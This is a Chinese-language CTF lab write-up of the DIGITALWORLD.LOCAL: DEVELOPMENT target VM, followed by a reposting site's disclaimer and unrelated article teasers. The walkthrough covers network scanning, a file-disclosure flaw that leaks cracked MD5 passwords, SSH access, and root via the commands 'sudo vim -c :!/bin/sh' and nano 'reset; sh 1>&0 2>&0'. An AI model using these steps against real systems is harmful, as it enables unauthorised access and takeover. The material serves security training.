红队打靶练习:DIGITALWORLD.LOCAL: DEVELOPMENT

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.141  00:50:56:2f:2e:b2       VMware, Inc.
192.168.12.254  00:50:56:f2:fe:52       VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.353 seconds (108.80 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.12.0/24Currently scanning: Finished!   |   Screen View: Unique Hosts63 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 3780_____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname-----------------------------------------------------------------------------192.168.12.1    00:50:56:c0:00:08     48    2880  VMware, Inc.192.168.12.2    00:50:56:ec:d1:ca      9     540  VMware, Inc.192.168.12.141  00:50:56:2f:2e:b2      5     300  VMware, Inc.192.168.12.254  00:50:56:f2:fe:52      1      60  VMware, Inc.

3、nmap
主机存活探测┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 14:59 CST
Nmap scan report for 192.168.12.1
Host is up (0.00027s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000051s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.141
Host is up (0.00012s latency).
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000053s latency).
MAC Address: 00:50:56:F2:FE:52 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.38 seconds

端口探测┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.141 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:02 CST
Nmap scan report for 192.168.12.141
Host is up (0.0026s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
113/tcp  open  ident
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk -F "/" '{print $1}' | head -n 10 | tail -n 5 | xargs -n 6 | sed 's/ /,/g'
22,113,139,445,8080

信息探测┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:03 CST
Nmap scan report for 192.168.12.141
Host is up (0.00043s latency).PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Allow: HEAD,GET,POST,OPTIONS
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Content-Length: 293
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.12.141 Port 8080</address>
|_    </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-server-header: IIS 6.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=12/21%Time=6583E358%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2021\x20Dec\
SF:x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\
SF:x20Wed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de3
SF:2091ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary
SF::\x20Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/h
SF:tml\r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR
SF:\x20OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welc
SF:ome\x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20a
SF:re\x20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20
SF:these\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20
SF:We\x20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection
SF:\x20system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@go
SF:odtech\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\
SF:x20by\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20
SF:development\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20
SF:-->\r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</ht
SF:ml>\r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x20
SF:21\x20Dec\x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow
SF::\x20HEAD,GET,POST,OPTIONS\r\nContent-Length:\x200\r\nConnection:\x20cl
SF:ose\r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CC,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x2021\x20Dec\x202023\x2007:
SF:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20293\r\nCon
SF:nection:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\
SF:r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//E
SF:N\">\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>
SF:\n<h1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x
SF:20that\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>
SF:\n<hr>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.12\.141\x20Po
SF:rt\x208080</address>\n</body></html>\n");
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENT\x00
|   Domain name: \x00
|   FQDN: development
|_  System time: 2023-12-21T07:05:23+00:00
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2023-12-21T07:05:23
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -4s, deviation: 3s, median: -6s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.12.141OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.48 seconds

漏洞探测┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:09 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.141
Host is up (0.00017s latency).PORT     STATE  SERVICE
22/tcp   closed ssh
113/tcp  open   ident
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
8080/tcp open   http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)Host script results:
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: falseNmap done: 1 IP address (1 host up) scanned in 197.55 seconds

4、端口总结

22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)  后续可以用的上。113/tcp  open  ident?     端口113/tcp是一个开放的ident端口。Ident(Identification Protocol)是一种用于验证连接的客户端的身份的协议。它通常用于识别和验证通过Internet连接到服务器的用户。139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)   端口139/tcp是一个开放的netbios-ssn端口,同时运行着Samba的smbd服务版本3.x到4.x,所属工作组为WORKGROUP。445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)  端口445/tcp是一个开放的netbios-ssn端口,同时运行着Samba的smbd服务版本4.7.6,所属工作组仍然是WORKGROUP8080/tcp open  http-proxy  IIS 6.0  IIS 是微软的Web服务器软件,用于托管网站和应用程序。端口8080通常是用作代理服务器,用于转发客户端发起的HTTP请求。

WEB

8080端口


翻译欢迎访问开发页面。
这个盒子里有很多项目。在html_pages上查看其中一些项目。
警告!我们正在试验一种基于主机的入侵检测系统。向报告所有误报patrick@goodtech.com.sg.

8080端口主页源码


<!-- Searching for development secret page... where could it be? --><!-- Patrick, Head of Development-->根据提示 development  这个单词出现的频率很高。
也提示我们去 html_pages 页面寻找信息。靶机提示说不建议使用暴力破解,我进行目录探测的时候,可能是因为线程太高,靶机直接不让我扫描了!而且靶机介绍信息也说了该主页不太稳定。

/development页面


要我们下载一个名为   test.pcap的流量包! 这个流量包其实就是个捷径!我这里没有列出,在流量包中设置过滤器为http,回显为200的流量包中可以找到一个路径!(/developmentsecretpage/sitemap.php)

/html_pages 页面


/development.html页面


访问 ./developmentsecretpage 


sitemap.php


来到 /developmentsecretpage/sitemap.php页面,点击注销。

漏洞探测



文件泄露


直接使用谷歌搜索,就会出现该漏洞的payload这个页面存在信息泄露以及文件包含漏洞!

我得到了账号密码:admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98MD5爆破admin, 3cb1d13bb83ffff2defe8d1443d3a0eb      
intern, 4a8a2b374f463b7aedbb44a066363b81   (12345678900987654321) 
patrick, 87e6d56ce79af90dbe07d387d3d0579e  (P@ssw0rd25)
qiu, ee64497098d0926d198f54f6d5431f98      (qiu)

ssh登录
┌──(root㉿ru)-[~/kali]
└─# ssh intern@192.168.12.141
intern@192.168.12.141's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-213-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Thu Dec 21 09:01:17 UTC 2023System load:  0.05               Processes:            171Usage of /:   31.5% of 19.51GB   Users logged in:      0Memory usage: 31%                IP address for ens33: 192.168.12.141Swap usage:   0%* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8sjust raised the bar for easy, resilient and secure K8s cluster deployment.https://ubuntu.com/engage/secure-kubernetes-at-the-edge* Canonical Livepatch is available for installation.- Reduce system reboots and improve kernel security. Activate at:https://ubuntu.com/livepatch186 packages can be updated.
56 updates are security updates.New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.Last login: Thu Dec 21 08:59:21 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ls
access  local.txt  work.txt
intern:~$

提权

系统信息收集
Last login: Thu Dec 21 09:03:54 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
intern:~$好家伙,只能使用这些命令。用别的话会退出。intern:~$ id
Traceback (most recent call last):File "/usr/local/bin/lshell", line 27, in <module>lshell.main()File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 1165, in maincli.cmdloop()File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 385, in cmdloopstop = self.onecmd(line)File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 503, in onecmdfunc = getattr(self, 'do_' + cmd)File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 134, in __getattr__if self.check_path(self.g_line) == 1:File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 303, in check_pathitem = re.sub('^~', self.conf['home_path'], item)File "/usr/lib/python2.7/re.py", line 155, in subreturn _compile(pattern, flags).sub(repl, string, count)
TypeError: expected string or buffer
Connection to 192.168.12.141 closed.┌──(root㉿ru)-[~/kali]
└─#

intern@development:~$ ls
access  local.txt  work.txt
intern@development:~$ cat local.txt
Congratulations on obtaining a user shell. :)
intern@development:~$ cat work.txt
1.      Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.2.      Patrick's start of the third year in this company!3.      Attend the meeting to discuss if password policy should be relooked at.
intern@development:~$

祝贺您获得用户权限。:)1.告诉帕特里克,喊话不管用。我们需要恢复到旧的方法来更新David关于shoutbox的信息。对于新的,我们将使用旧导演的登录页。
2.帕特里克在这家公司的第三年开始了!
3.参加会议讨论是否应重新查看密码策略。

intern@development:~$ cat /etc/passwd | grep "/home" | grep -v "nologin"
admin:x:1000:1004:DEVELOPMENT:/home/admin:/bin/bash
patrick:x:1001:1005:,,,:/home/patrick:/bin/bash
intern:x:1002:1006::/home/intern:/usr/local/bin/lshell

intern@development:/home$ cd intern/
intern@development:~$ ls -al
total 36
drwxr-xr-x 6 intern intern 4096 Dec 21 09:07 .
drwxr-xr-x 5 root   root   4096 Jun 14  2018 ..
drwxrwxrwx 9 intern intern 4096 Jul 16  2018 access
drwx------ 2 intern intern 4096 Jul 16  2018 .cache
drwx------ 3 intern intern 4096 Jul 16  2018 .gnupg
-rw------- 1 intern intern   56 Dec 21 09:07 .lhistory
drwxrwxr-x 3 intern intern 4096 Jul 15  2018 .local
-rw-r--r-- 1 intern intern   46 Dec 26  2018 local.txt
-rw-r--r-- 1 intern intern  299 Dec 26  2018 work.txt
intern@development:~$ cd access/
intern@development:~/access$ ls
IA64  tcpdump.txt  W32ALPHA  W32MIPS  W32PPC  W32X86  WIN40  x64
intern@development:~/access$ cat tcpdump.txt
1. request for rights to perform tcpdump on traffic. we want to monitor network traffic.
2. tcpdump is a useful tool; we should learn how to pipe tcpdump traffic for building up our Security Operations Centre.
intern@development:~/access$1.请求对流量执行tcpdump的权限。我们想要监控网络流量。
2.tcpdump是一个有用的工具;我们应该学习如何通过管道传输tcpdump流量来建立我们的安全操作中心。

intern@development:/home/patrick$ ls -al
total 40
drwxr-xr-x 4 patrick patrick 4096 Sep 29  2018 .
drwxr-xr-x 5 root    root    4096 Jun 14  2018 ..
-rw-r--r-- 1 patrick patrick  168 Jul 23  2018 access.txt
-rw-r--r-- 1 patrick patrick  220 Jun 12  2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3771 Jun 12  2018 .bashrc
drwx------ 2 patrick patrick 4096 Jun 12  2018 .cache
drwx------ 3 patrick patrick 4096 Jun 12  2018 .gnupg
-rw-r--r-- 1 patrick patrick  425 Jul 23  2018 password.txt
-rw-r--r-- 1 patrick patrick  807 Jun 12  2018 .profile
-rw-r--r-- 1 patrick patrick    0 Jun 12  2018 .sudo_as_admin_successful
-rw------- 1 patrick patrick 1077 Aug 27  2018 .viminfo
intern@development:/home/patrick$ cat access.txt
/-\/-\----/-\/-\
\-/\-/\--/\-/\-/ACCESS PANEL/-\/-\/--\/-\/-\
\-/\-/----\-/\-/LOGIN: _________
PASSWORD: ______SORRY.
ACCESS DENIED.YOU MUST...
TRY HARDER.
intern@development:/home/patrick$ cat password.txt
(----------------------)(--------------------)(------------------)(----------------)(--------------)WELCOME TO THEPASSWORDPORTALINTRUDERALERT!(---------------)(-----------------)(-------------------)(---------------------)
(-----------------------)TO ROOT ME, YOU NEED TO(-----------------------)TRY HARDER!!!(-----------------------)

密码就是之前我们找到的  patrick, 87e6d56ce79af90dbe07d387d3d0579e  (P@ssw0rd25)

本地提权
intern@development:/home/patrick$ su patrick
Password:
patrick@development:~$ id
uid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)
patrick@development:~$

patrick@development:~$ sudo -l
Matching Defaults entries for patrick on development:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser patrick may run the following commands on development:(ALL) NOPASSWD: /usr/bin/vim(ALL) NOPASSWD: /bin/nano
patrick@development:~$

vim提权patrick@development:~$ sudo vim -c ':!/bin/sh'# id
uid=0(root) gid=0(root) groups=0(root)
#payload1、sudo vim -c ':!/bin/sh'2、sudo vim  --> :!/bin/bash

nano提权Command to execute: reset; sh 1>&0 2>&0#
#  Get Help                        ^X Read File
#  Cancel                          M-F New Buffer
#
#
# id
uid=0(root) gid=0(root) groups=0(root)payloadsudo nano
^R^X   = ctrl + r 、ctrl + x
reset; sh 1>&0 2>&0

get root and flag
# id
uid=0(root) gid=0(root) groups=0(root)# whereis python
python: /usr/bin/python /usr/bin/python2.7 /usr/bin/python3.6 /usr/bin/python3.6m /usr/lib/python3.7 /usr/lib/python2.7 /usr/lib/python3.6 /etc/python /etc/python2.7 /etc/python3.6 /usr/local/lib/python2.7 /usr/local/lib/python3.6 /usr/share/python /usr/share/man/man1/python.1.gz# python2 -c 'import pty;pty.spawn("/bin/bash")'root@development:/root# ls -al
total 72
drwx------  5 root  root    4096 Dec 26  2018 .
drwxr-xr-x 23 root  root    4096 Dec 21 08:27 ..
-rw-------  1 root  root    1622 Dec 26  2018 .bash_history
-rw-r--r--  1 root  root    3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root  root     644 Jun 14  2018 iptables-rules
drwxr-xr-x  3 root  root    4096 Jun 12  2018 .local
drwxr-xr-x  7 admin lpadmin 4096 Aug 23  2018 lshell-0.9.9
-rw-r--r--  1 root  root     148 Aug 17  2015 .profile
----------  1 root  root      43 Dec 26  2018 proof.txt
-rw-------  1 root  root    1024 Aug  1  2018 .rnd
-rw-r--r--  1 root  root      66 Sep 26  2018 .selected_editor
-rw-r--r--  1 root  root    9542 Jul 15  2018 smb.conf
drwx------  2 root  root    4096 Jun 10  2018 .ssh
-rwx------  1 root  root     229 Sep 26  2018 tcpdumpclock.sh
-rw-------  1 root  root     582 Aug 27  2018 .viminfo
-rw-r--r--  1 root  root     209 Aug  1  2018 .wget-hstsroot@development:/root# cat proof.txt
Congratulations on rooting DEVELOPMENT! :)root@development:/root#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/239092.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数字图像处理-空间域图像增强-爆肝18小时用通俗语言进行超详细的总结

目录 灰度变换 直方图&#xff08;Histogram&#xff09; 直方图均衡 直方图匹配&#xff08;规定化&#xff09; 空间滤波 低通滤波器 高通滤波器 ​​​​​​​ 本文章讲解数字图像处理空间域图像增强&#xff0c;大部分内容来源于课堂笔记中 灰度变换 图像增强&…

使用Python将OSS文件免费下载到本地:第一步 列举OSS文件

大家好,我是水滴~~ 本文将介绍了使用的知识点、以及列举OSS文件的代码、并对该代码进行详细解析、最后给出部署方案,希望能对你有所帮助! 《Python入门核心技术》专栏总目录・点这里 系列文章 使用Python将OSS文件免费下载到本地:项目分析和准备工作使用Python将OSS文件免…

【网络安全】学习Web安全必须知道的一本书

【文末送书】今天推荐一本网络安全领域优质书籍。 目录 正文实战案例1&#xff1a;使用Docker搭建LAMP环境实战案例2&#xff1a;使用Docker搭建LAMP环境文末送书 正文 学习Web安全离不开Web&#xff0c;那么&#xff0c;需要先来学习网站的搭建。搭建网站是每一个Web安全学习…

为什么SSL证书是必备之物?

SSL证书的首要任务是保障用户和网站之间的数据传输安全。未加密的数据传输容易受到中间人攻击&#xff0c;使敏感信息暴露于风险之中。SSL通过加密数据&#xff0c;有效地抵御了这些潜在的威胁&#xff0c;确保用户的隐私得到充分保护。 采用SSL证书的网站在浏览器地址栏中通常…

如何进行USB丢弃攻击?

USB丢弃攻击&#xff0c;类似于一场表演艺术&#xff0c;您需要构建一个引人入胜的故事&#xff0c;激发目标的好奇心&#xff0c;让他们忽略基本的安全意识&#xff0c;插入您精心准备的USB设备! 本文章仅限娱乐&#xff0c;请勿模仿或进行违法活动&#xff01; 一、选择放置…

Java版企业电子招投标系统源代码,支持二次开发,采用Spring cloud微服务架构

招投标管理系统是一个集门户管理、立项管理、采购项目管理、采购公告管理、考核管理、报表管理、评审管理、企业管理、采购管理和系统管理于一体的综合性应用平台。它适用于招标代理、政府采购、企业采购和工程交易等业务的企业&#xff0c;旨在提高项目管理的效率和质量。该系…

Http---HTTP响应报文

1. HTTP响应报文分析 HTTP 响应报文效果图: 响应报文说明: --- 响应行/状态行 --- HTTP/1.1 200 OK # HTTP协议版本 状态码 状态描述 --- 响应头 --- Server: Tengine # 服务器名称 Content-Type: text/html; charsetUTF-8 # 内容类型 Transfer-Encoding: chunked # 发送给客…

【Qt之Quick模块】5. QML基本类型及示例用法

QML格式 QML基本类型 在 QML 中&#xff0c;有以下基本类型&#xff1a; int&#xff1a;整数类型。 Rectangle {function myFunction() {// 输出 debug 信息console.log("11 " (11));}Component.onCompleted: {myFunction();} }结果&#xff1a; 2. real&…

FreeRTOS之队列集操作(实践)

多个任务在在同一队列中传递的同一种数据类型&#xff0c;而队列集能够在任务之间传递不同的数据类型。 配置流程&#xff1a;&#xff08;更详细流程参考正点原子的教程&#xff09; 1、启用队列集将configUSE_QUEUE_SETA置1&#xff09; 2、创建队列集 3、创建队列或信号…

SpringBoot对接支付宝完成扫码支付

文章目录 1、支付方式选择2、交互流程3、对接准备1&#xff09;加密解密 签名验签2&#xff09;沙箱环境3&#xff09;内网穿透 4、二维码5、下单6、异步通知回调7、查询支付结果8、退款9、通用版SDK 需求&#xff1a;系统A对接支付宝&#xff0c;实现支持用户扫码支付 1、支…

成为一名FPGA工程师:面试题与经验分享

在现代科技领域&#xff0c;随着数字电子技术的迅猛发展&#xff0c;FPGA&#xff08;可编程逻辑器件&#xff09;工程师成为了备受瞩目的职业之一。FPGA工程师不仅需要掌握硬件设计的基本原理&#xff0c;还需要具备良好的编程能力和解决问题的实践经验。面对如此竞争激烈的行…

语音识别之百度语音试用和OpenAiGPT开源Whisper使用

0.前言: 本文作者亲自使用了百度云语音识别,腾讯云,java的SpeechRecognition语言识别包 和OpenAI近期免费开源的语言识别Whisper(真香警告)介绍了常见的语言识别实现原理 1.NLP 自然语言处理(人类语言处理) 你好不同人说出来是不同的信号表示 单位k 16k16000个数字表示 1秒160…

C语言中关于操作符的理解

本篇文章只会列出大家在生活中经常使用的操作符 算术操作符 在算数操作符中常用的有&#xff0c;&#xff0c;-&#xff0c;*&#xff0c;/&#xff0c;% &#xff0c;我们重点讲一讲 / (除) 和 % (模) " / "运算 #include <stdio.h>int main() {int a5/2;fl…

探讨APP自动化测试工具的重要性

随着移动应用市场的蓬勃发展&#xff0c;企业对于保证其移动应用质量和用户体验的需求日益迫切。在这一背景下&#xff0c;APP自动化测试工具正变得越来越重要&#xff0c;成为企业成功的关键组成部分。本文将探讨APP自动化测试工具对企业的重要性&#xff0c;并为您解析其在提…

Spring中你一定要知道的@PostConstruct/@PreDestroy

文章目录 功能源码解析执行 功能 Spring中存在很多回调&#xff0c;但是执行他们的时机都不相同&#xff0c;也许大家用的最多的是InitializingBean.afterPropertiesSet&#xff0c;这个方法的作用如名称一样&#xff0c;是bean初始化后执行的一个回调操作&#xff0c;而PostC…

nodejs+vue+ElementUi家政服务系统c90g5

项目中登录模块用到token家政服务平台有管理员&#xff0c;雇主&#xff0c;雇员三个角色。管理员功能有个人中心&#xff0c;雇主管理&#xff0c;雇员管理&#xff0c;资料认证管理&#xff0c;项目类型管理&#xff0c;服务项目管理&#xff0c;需求信息管理&#xff0c;服务…

C# WPF上位机开发(软件的发布和部署)

【 声明&#xff1a;版权所有&#xff0c;欢迎转载&#xff0c;请勿用于商业用途。 联系信箱&#xff1a;feixiaoxing 163.com】 软件编译完成之后&#xff0c;本地测试完之后&#xff0c;一般都要发布和部署到客户的电脑上面。客户电脑的配置未必和开发的电脑是一样的&#xf…

mysql 23day DDL常用约束,数据类型

目录 数据库的四种语言常用约束&#xff08;DDL&#xff09;创建格式PRIMARY KEY&#xff1a;主键约束FOREIGN KEY&#xff1a;外键约束主键外键 联合测试开始测试 NOT NULL&#xff1a;非空约束UNIQUE&#xff1a;唯一约束DEFAULT&#xff1a;默认值约束zerofill 零填充auto_i…

自制数据库空洞率清理工具-C版-01-EasyClean-V1.0(支持南大通用数据库Gbase8a)

目录 一、环境信息 二、简述 三、支持功能 四、空洞率 五、工具流程图 六、安装包下载地址 七、参数介绍 1、命令模板 2、命令样例 3、参数表格 八、安装步骤 1、配置环境变量 2、生效环境变量 3、检验动态链接是否正常 九、运行效果 一、环境信息 名称值CPUInt…

Windows电脑向ipad和iOS系统共享文件夹

Windows电脑向ipad和iOS系统共享文件夹 这个方案不需要下载任何软件&#xff0c;但是要求 iOS 和 Windows 在同一个局域网内。再大的文件都可以在 iOS13 自带的的“文件App”里实时显示&#xff0c;可以直接打开。这个解决方案需要你 Windows 电脑上登陆了微软账号&#xff0c…